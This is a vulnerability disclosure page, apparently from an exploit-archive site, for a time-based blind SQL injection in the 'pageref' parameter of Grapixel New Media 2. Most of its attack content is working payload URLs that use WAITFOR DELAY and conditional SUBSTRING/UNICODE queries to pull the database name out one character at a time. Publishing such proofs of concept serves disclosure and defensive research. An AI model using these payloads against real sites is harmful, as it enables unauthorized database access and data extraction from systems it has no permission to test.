Grapixel New Media 2 SQL Injection

2018.10.30
Credit: Berk Dusunur
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Grapixel New Media 2 - 'pageref' SQL Injection # Exploit Author: Berk Dusunur # Google Dork: N/A # Type: Web App # Date: 2018-10-26 # Vendor Homepage: http://www.grapixel.com # Software Link: http://www.grapixel.com # Affected Version: v2 # Tested on: MacosX # CVE : N/A #Proof Of Concept # Time-Based sql injection is called a data extraction event with request response times # with the server when there is no other way for it to extract aggressive data. It should # be determined by sql injection type. I discovered blind time-based sql injection. # Because single quotes didn't break the page structure, so I tried to get results # using waitfor delay instead. http://target/pages.aspx?pageref=[SQL] http://target/pages.aspx?pageref=' waitfor delay '00:00:05'--; http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>80) WAITFOR DELAY '0:0:5'-- http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>81) WAITFOR DELAY '0:0:5'-- Ascii equivalent of 80,81 figures The first database, wait 5 seconds if the first letter is "p"


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top